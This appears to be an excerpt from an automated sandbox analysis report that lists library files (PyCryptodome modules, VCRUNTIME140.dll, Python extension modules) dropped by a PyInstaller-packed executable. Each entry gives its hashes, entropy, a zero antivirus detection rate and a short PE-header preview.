                                                                                                                                                                                                                            SHA1:4D1D3251CC5E61C7FCF5DC6273E3D7BA301D6CA9
                                                                                                                                                                                                                            SHA-256:BA4C1492BB4884F3D77F61A7D23EC9E190EB7DA3A115A271D0954D933264FB71
                                                                                                                                                                                                                            SHA-512:25A86C56B84275C2314AD1FD98635B43373977DFC6F2F6737F22B1962A3BB5480539A35DB9FBB70FCA16F5ACB5F19BAB63E1CADA776D1667D07332322F641A5F
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........&...H...H...H......H..I...H..I...H...I...H..M...H..L...H..K...H...@...H...H...H.......H...J...H.Rich..H.........................PE..d...]a.c.........." ..."............P.....................................................`..........................................8......89..d....`.......P...............p..,....3...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......(..............@....pdata.......P.......*..............@..@.rsrc........`......................@..@.reloc..,....p.......0..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_ghash_portable.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):13312
                                                                                                                                                                                                                            Entropy (8bit):5.021050571118178
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:HeF/1nb2eqCQtks0iiNqdF4mtPjD0MA5LPYcqgYvEL2x:02P6fFA/4GjDYcgYvEL2x
                                                                                                                                                                                                                            MD5:1A3A27F63AFEB42C0282EADA02AC834A
                                                                                                                                                                                                                            SHA1:FADDA44628AEF3EC70CC02FC0E43A88C7832F7BC
                                                                                                                                                                                                                            SHA-256:E7A7AB2D31AEE3B99773C814114D60EB71107EF862930C582F99313943249163
                                                                                                                                                                                                                            SHA-512:0D6D397F87CC5A8A83F1DF20687C967DF4FAF80CF0807AE2B06969E16C107F18A5D39CE34C32C42A53D1726A50860C180266ECAD81B4235F041920F496B25FC7
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........EY.o+..o+..o+......o+...*..o+...*..o+..o*..o+......o+.../..o+...(..o+...#..o+...+..o+......o+...)..o+.Rich.o+.................PE..d...]a.c.........." ..."............P.....................................................`..........................................8......h9..d....`.......P..X............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......*..............@....pdata..X....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..,....p.......2..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_keccak.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):15872
                                                                                                                                                                                                                            Entropy (8bit):5.2611173941646205
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:CjP2T9FRjRskTdf4YBU7YP5yUYDn1give:CcHlRl57IC8UYDnG
                                                                                                                                                                                                                            MD5:3CFA49A173B55891D855BF6D4FEB56C2
                                                                                                                                                                                                                            SHA1:2AC09A5F0082B40B4DD801D436DE0391C76A5E6E
                                                                                                                                                                                                                            SHA-256:0FAB7DF1E54416434F670EF97ED474FA11C09AA30BED1A8575A09E26DB6DF63C
                                                                                                                                                                                                                            SHA-512:AD4B300C8F561A6068946590D53551C93D99D5A728ED87D142B4186CA65C28FE793D343BC09804AB9AEA2B8FAA263F06073BE4231D610390EFD65472C5E7AAC4
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%Y.oK..oK..oK......oK...J..oK...J..oK..oJ..oK...N..oK...O..oK...H..oK...C..oK...K..oK......oK...I..oK.Rich.oK.........................PE..d...\a.c.........." ...". ... ......P.....................................................`.........................................`9......T:..d....`.......P..p............p..,....3...............................2..@............0...............................text............ .................. ..`.rdata.......0.......$..............@..@.data........@.......4..............@....pdata..p....P.......6..............@..@.rsrc........`.......:..............@..@.reloc..,....p.......<..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_poly1305.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):15360
                                                                                                                                                                                                                            Entropy (8bit):5.1302421684233535
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:CHZNGfqDgvUh43G6coX2SSwmPL4V7wTdDll1Y2cqgWjvE:CiFMhuGGF2L4STdDJYWgWjvE
                                                                                                                                                                                                                            MD5:ECA16BB6EF78ADF91705ACD412CE4F49
                                                                                                                                                                                                                            SHA1:C1FFA8FD2A8898CCF4C923B54C015314DC76B333
                                                                                                                                                                                                                            SHA-256:3A22C6E97AD47A8FA33E9B28455CE3E6D72008A9A1800F6489FF5AF752C37F18
                                                                                                                                                                                                                            SHA-512:DAC721445E07944266BBFA4E6AE4CB5018FD2E042455D5FA545FA93CB009F3E539BB88FC2FA4CEB758C2AABCA67FCCD2043368F0D9B5B83EBEF35346F9EB7562
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%Y.oK..oK..oK......oK...J..oK...J..oK..oJ..oK...N..oK...O..oK...H..oK...C..oK...K..oK......oK...I..oK.Rich.oK.........................PE..d...^a.c.........." ..."..... ......P.....................................................`......................................... 9.......9..d....`.......P..|............p..,....3...............................1..@............0...............................text...X........................... ..`.rdata..(....0......."..............@..@.data........@.......2..............@....pdata..|....P.......4..............@..@.rsrc........`.......8..............@..@.reloc..,....p.......:..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Math\_modexp.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):35840
                                                                                                                                                                                                                            Entropy (8bit):5.847604537982625
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:dxSlYMeNklGS7W5AvQEzRI7V4pMgn0i9yoZrjrq1GS:HSlWNs57uAvQEzR04pMg0WpZrjrq
                                                                                                                                                                                                                            MD5:BEEC00F147B53EF8033EB5DF8821AEF0
                                                                                                                                                                                                                            SHA1:FF0F5F7C8F168986580C9FFE3B256C966BB0C820
                                                                                                                                                                                                                            SHA-256:404EDF6130C709A88B7387F51B6D746BED96230E6C0E670641AFCA799279B504
                                                                                                                                                                                                                            SHA-512:678C1E64A7632D8B2628C30578DA227FAFC4D8AE14E020C183FA4AD3B99E2AD45DD695341E7B3196B6E199E68FA5EDABB651757DF34C395A63DB548D770DA649
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L..|.../.../.../..Q/.../G....../C....../.../#../G....../G....../G....../....../....../.=/.../....../Rich.../................PE..d...la.c.........." ...".\...2......0.....................................................`..........................................~..d...T...d...............$...............,....s...............................q..@............p..(............................text...XZ.......\.................. ..`.rdata.......p.......`..............@..@.data................t..............@....pdata..$...........................@..@.rsrc...............................@..@.reloc..,...........................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Protocol\_scrypt.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):12288
                                                                                                                                                                                                                            Entropy (8bit):4.798545931891201
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:lCkCffqPSTMeAk4OeR64ADp6i6RcqgO5vE:lAZMcPeR64ADT63gO5vE
                                                                                                                                                                                                                            MD5:DD7D22A0AFE540C07CE9D919CD779203
                                                                                                                                                                                                                            SHA1:0E76DB96EC2D9922937A77ABEDB7E61037CC8CB9
                                                                                                                                                                                                                            SHA-256:880A4418D81C4DA0D588C0CFD7C68D8C5476385D9203A2D6DED25A0F7B330A76
                                                                                                                                                                                                                            SHA-512:BD720CF67E264040F8076EDBB72843305094F1D87BD03A1E9FBEB47564F3963120D76BAD6887FEA560B45958F2FFA929A7D63EA1EC9B633DA23784D98A68C32A
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................;..................................................................W.............Rich............................PE..d...ca.c.........." ..."............P.....................................................`..........................................8..d...$9..d....`.......P..4............p..,....3...............................1..@............0...............................text...x........................... ..`.rdata.......0......................@..@.data........@.......&..............@....pdata..4....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..,....p......................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\PublicKey\_ec_ws.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):754688
                                                                                                                                                                                                                            Entropy (8bit):7.627131782370933
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:wwEuHoxJ8gf1266y8IXhJvCKAmqVLzcrZgYIMGv1iLD9yQvG6hz:xEuHoxJFf1p34hcrn5Go9yQO6x
                                                                                                                                                                                                                            MD5:62A32904910D5550F21C4C4D08993ABE
                                                                                                                                                                                                                            SHA1:834FB3919E49439353B62A8B7456E6E5E879EFE0
                                                                                                                                                                                                                            SHA-256:3EE17F4004B4EA1DB4D85DB545223AADD6FDD635DF6120A354F6DC605F848B76
                                                                                                                                                                                                                            SHA-512:7D45AD10623F297485789DB5BFC153FC8DBC5DB0F1E60D2B244B8B02DACE9A5DD9F947C6EBD7E67739DDCB25569F056FBB131AFB55E817EA6F29112C122FBA1B
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`...$..L$..L$..L-.#L"..Lk.M&..Lo.M'..L$..L...Lk.M(..Lk.M,..Lk.M'..L..M!..L..M%..L..OL%..L..M%..LRich$..L................PE..d...ha.c.........." ...".n..........0.....................................................`.........................................pp..d....q..d...............l...............4...@Z...............................Y..@...............(............................text...hm.......n.................. ..`.rdata..d............r..............@..@.data................j..............@....pdata..l............r..............@..@.rsrc...............................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\PublicKey\_ed25519.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):27648
                                                                                                                                                                                                                            Entropy (8bit):5.7998007997145695
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:vRwib1zOF2cZT1n0/kyTMIl9bhgIW0mvNah4rzWrxmlPft/wxD6sQsgkbQ0e1J:JLpI2czeM+9dmvNah4uktIxDIkf
                                                                                                                                                                                                                            MD5:9E8C8445A0AFCE8FB90F09393D8632A7
                                                                                                                                                                                                                            SHA1:F71D027B4064C60BCD6A997E770FBA9F157C907C
                                                                                                                                                                                                                            SHA-256:401915CD7832F79187DBE9C1837EF3D2F1C5F274552500A7610453537C3865F5
                                                                                                                                                                                                                            SHA-512:E8E7836F1FB28964C1F921EF3FFE42CF43614F52E74BB88458673F216340322B591916FA7FB1E36270CA959A9FAA18AA70C42D5F72B1015BEA8F9198C30BD36E
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y.o...o...o.......o.......o.......o...o...o.......o.......o.......o.......o.......o....t..o.......o..Rich.o..................PE..d...ja.c.........." ...".F...(......P.....................................................`..........................................j..0....k..d...............................,...pc..............................0b..@............`...............................text....D.......F.................. ..`.rdata.."....`.......J..............@..@.data................\..............@....pdata...............d..............@..@.rsrc................h..............@..@.reloc..,............j..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\PublicKey\_ed448.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):68096
                                                                                                                                                                                                                            Entropy (8bit):6.032199417476561
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:eVoBLZD2Ia9nihf5WeimczTvc/XVTF1bLG4/7MAvQZzS36JM+t:eVoBLZD2Ia9nihf5WFbYXVTFRqaMAvQl
                                                                                                                                                                                                                            MD5:6E8F6149B570FD60969FB9183BA87CEB
                                                                                                                                                                                                                            SHA1:F7EFA3B00072B00847E63061FE16D9722874DC62
                                                                                                                                                                                                                            SHA-256:7C212E351BB27B6E88C9FCCA8315405EE6E3098E88FFB31A2706950E537CA52C
                                                                                                                                                                                                                            SHA-512:DF74418FF014AC96CC8C78F964536992E18129B19F17D1EBF4BDDA0E30D168F5F6628D28A0DA1A63F89EEFD1A9BF332360317FE2CF50636834AD1124420F05DA
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L..|.../.../.../..Q/.../G....../C....../.../#../G....../G....../G....../....../....../.=/.../....../Rich.../................PE..d...ka.c.........." ...".....:......0........................................`............`.............................................h...(...d....@.......0..$............P..,.......................................@............................................text...X........................... ..`.rdata..............................@..@.data...............................@....pdata..$....0......................@..@.rsrc........@......................@..@.reloc..,....P......................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\PublicKey\_x25519.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):10752
                                                                                                                                                                                                                            Entropy (8bit):4.48986296849646
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:ypVVdJvbrqTuy/Th/Y0IluLfcC75JiC4cs89EfqADBhDsAbcX6gn/7EC:gVddiTHThQTctdErDDDsicqgn/7
                                                                                                                                                                                                                            MD5:F1A2E905085675FC72DE2BA11BF43370
                                                                                                                                                                                                                            SHA1:6BA1331FEED29AF133E9FBDA5781CCEC8DC57319
                                                                                                                                                                                                                            SHA-256:FAAEA0BFC5EAFA3EBCD625A4F12CCD260D8AF2236D073C86A30C3A1AE38BA141
                                                                                                                                                                                                                            SHA-512:1472363871D5C69A5966E32BE8A11C1E3976A5ACC3F5AE51945884514BA4E66FF0C36597152E5A349FB16E66AAC2D4465C1F58EE1322D0712F7AF63875115AFA
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&6!.bWO.bWO.bWO.k/..`WO.-+N.`WO.)/N.aWO.bWN.FWO.-+J.iWO.-+K.jWO.-+L.aWO.+G.cWO.+O.cWO.+..cWO.+M.cWO.RichbWO.........PE..d...ia.c.........." ..."............P........................................p............`..........................................'..P...0(..P....P.......@...............`..,...P#..............................."..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Util\_cpuid_c.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):10240
                                                                                                                                                                                                                            Entropy (8bit):4.73280708403616
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:kDJVVdJvbrqTuy/Th/Y0IluLfcC75JiCKs89EVAElIijKDQGGbM6YJWJcX6gbW6s:6VddiTHThQTctEEaEDKDKMRWJcqgbW6
                                                                                                                                                                                                                            MD5:A9B7C866C5A18CC96570CCA3BE6A2433
                                                                                                                                                                                                                            SHA1:4F78C7516E512529B977048BC87ED3A95383B44E
                                                                                                                                                                                                                            SHA-256:72998624C023B21F21E449F3268B7E839B248BA55440087CB6B421ED65F9A1B5
                                                                                                                                                                                                                            SHA-512:EC890E84384C7B1804CE73B097EF068BADA15ADB5F76E1E9B2BCC54CDE910165A9729F40A1AC18D196DDD3EE4EE60A0CFAA6D56DAAFCAD10630AD2658FAF485B
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&6).bWG.bWG.bWG.k/..`WG.-+F.`WG.)/F.aWG.bWF.AWG.-+B.iWG.-+C.jWG.-+D.aWG.+O.cWG.+G.cWG.+..cWG.+E.cWG.RichbWG.........................PE..d...aa.c.........." ..."............P........................................p............`..........................................'..|....'..P....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..,....`.......&..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Util\_strxor.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):10240
                                                                                                                                                                                                                            Entropy (8bit):4.688658167085762
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:k0yZVVdJvbrqTuy/Th/Y0IluLfcC75JiCKs89EMz3DOWMot4BcX6gbW6O:XQVddiTHThQTctEEO3DEoKcqgbW6
                                                                                                                                                                                                                            MD5:5738D83E2A66B6ACE4F631A9255F81D9
                                                                                                                                                                                                                            SHA1:5B6EBB0B82738781732CF7CFD497F5AEB3453DE2
                                                                                                                                                                                                                            SHA-256:F2718ADADB6E9958081DCB5570EF737C66772C166A6AD8C0401ADCD9A70F46A0
                                                                                                                                                                                                                            SHA-512:BB21B62FD7FEE22DFA04274D0FA1AEC666C7845CD2EC3F01F1A0418A2C68F228EC0AE451C793CCAE3AA88F1EFEE5D6019138C0975497518F990B8511B2FD0E75
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&6).bWG.bWG.bWG.k/..`WG.-+F.`WG.)/F.aWG.bWF.AWG.-+B.iWG.-+C.jWG.-+D.aWG.+O.cWG.+G.cWG.+..cWG.+E.cWG.RichbWG.........................PE..d...ca.c.........." ..."............P........................................p............`.........................................`'..t....'..P....P.......@...............`..,...."...............................!..@............ ...............................text...x........................... ..`.rdata....... ......................@..@.data...8....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..,....`.......&..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\VCRUNTIME140.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):97160
                                                                                                                                                                                                                            Entropy (8bit):6.422776154074499
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:yDHLG4SsAzAvadZw+1Hcx8uIYNUzUnHg4becbK/zJrCT:yDrfZ+jPYNznHg4becbK/Fr
                                                                                                                                                                                                                            MD5:11D9AC94E8CB17BD23DEA89F8E757F18
                                                                                                                                                                                                                            SHA1:D4FB80A512486821AD320C4FD67ABCAE63005158
                                                                                                                                                                                                                            SHA-256:E1D6F78A72836EA120BD27A33AE89CBDC3F3CA7D9D0231AAA3AAC91996D2FA4E
                                                                                                                                                                                                                            SHA-512:AA6AFD6BEA27F554E3646152D8C4F96F7BCAAA4933F8B7C04346E410F93F23CFA6D29362FD5D51CCBB8B6223E094CD89E351F072AD0517553703F5BF9DE28778
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..qn.."n.."n.."...#l.."g.."e.."n.."B.."<..#c.."<..#~.."<..#q.."<..#o.."<.g"o.."<..#o.."Richn.."................PE..d....(.`.........." .........`......p.....................................................`A.........................................B..4....J...............p..X....X...#..........h,..T............................,..8............................................text............................... ..`.rdata...@.......B..................@..@.data...@....`.......@..............@....pdata..X....p.......D..............@..@_RDATA...............P..............@..@.rsrc................R..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\_asyncio.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):65256
                                                                                                                                                                                                                            Entropy (8bit):5.947146092578557
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:eKMg5KvjSGhtDwdt9psnqRTRWqJ7J8j+Ba36oWeU9MhI8YnsRjDG4yjK5ShHP:ejv+GbWpWmk6oWezhI8YnwVyjK5KP
                                                                                                                                                                                                                            MD5:3510357B9885A59B08FA557E3BAED3CE
                                                                                                                                                                                                                            SHA1:3C3289172FABB46CD4839532D7E41087F8FFEA29
                                                                                                                                                                                                                            SHA-256:3AD5F4BD4361DF0C077122A91D180DCF9B68B0249FC6B39EDDA5DD4ECE6F23F1
                                                                                                                                                                                                                            SHA-512:86AFB38825270F3A65240955432EBC85874EE3E44A1AED564E5160F79FB58162FE2B841DD6E542F942499CFE66C78A264CC3CD7CA13285DB0B6CA81D0ED7EC31
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........}..}...}...}.......}......}......}......}......}..s....}.......}...}..D}..s....}..s....}..s....}..s....}..Rich.}..........PE..d...O>-a.........." .....`................................................... ......5X....`.............................................P.......d...................................@v..T............................v..8............p..0............................text....^.......`.................. ..`.rdata...J...p...L...d..............@..@.data.... ..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\_bz2.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):86760
                                                                                                                                                                                                                            Entropy (8bit):6.4230860471078755
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:26r9z7HMjxuqMfXA5eogNEkqpltT88tOHiy387pI8MVJZyyD:26RzI7M45HkEkqpl68sHiy3GpI8MV1D
                                                                                                                                                                                                                            MD5:124678D21D4B747EC6F1E77357393DD6
                                                                                                                                                                                                                            SHA1:DBFB53C40D68EBA436934B01EBE4F8EE925E1F8E
                                                                                                                                                                                                                            SHA-256:9483C4853CA1DA3C5B2310DBDD3B835A44DF6066620278AA96B2E665C4B4E86B
                                                                                                                                                                                                                            SHA-512:2882779B88ED48AF1E27C2BC212DDC7E4187D26A28A90655CEF98DD44BC07CC93DA5BCE2442AF26D7825639590B1E2B78BF619D50736D67164726A342BE348FA
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G .>.A.m.A.m.A.m.9<m.A.mQ4.l.A.me.Rm.A.mQ4.l.A.mQ4.l.A.mQ4.l.A.m.4.l.A.m.*.l.A.m.A.mcA.m.4.l.A.m.4.l.A.m.4Pm.A.m.4.l.A.mRich.A.m........................PE..d...d>-a.........." .........f............................................................`..........................................'..H...X'.......`.......P..4....6.......p...... ...T...............................8...............@............................text............................... ..`.rdata..8C.......D..................@..@.data........@......................@....pdata..4....P....... ..............@..@.rsrc........`.......*..............@..@.reloc.......p.......4..............@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\_cffi_backend.cp39-win_amd64.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):181248
                                                                                                                                                                                                                            Entropy (8bit):6.191379701419999
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3072:Ip5LZ3sgWSqjey8dBbm/6WnwsHozUsS7KiSTLkK6ABT6yRH:IptZ8gW9j0BbQnrIzDriSTLL6iT6y
                                                                                                                                                                                                                            MD5:BA20B38817BD31B386615E6CF3096940
                                                                                                                                                                                                                            SHA1:DFD0286BC3D11D779F6B24F4245B5602B1842DF0
                                                                                                                                                                                                                            SHA-256:0FFFE7A441F2C272A7C6D8CF5EB1ADCE71FDE6F6102BC7C1CEB90E05730C4B07
                                                                                                                                                                                                                            SHA-512:B580C1C26F4DDEA3FB7050C83839E9E3EDE7659F934928072AE8DA53DB0C92BABC72DBC01130EC931F4EC87E3A3118B6D6C42A4654CD6775E24710517585B275
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
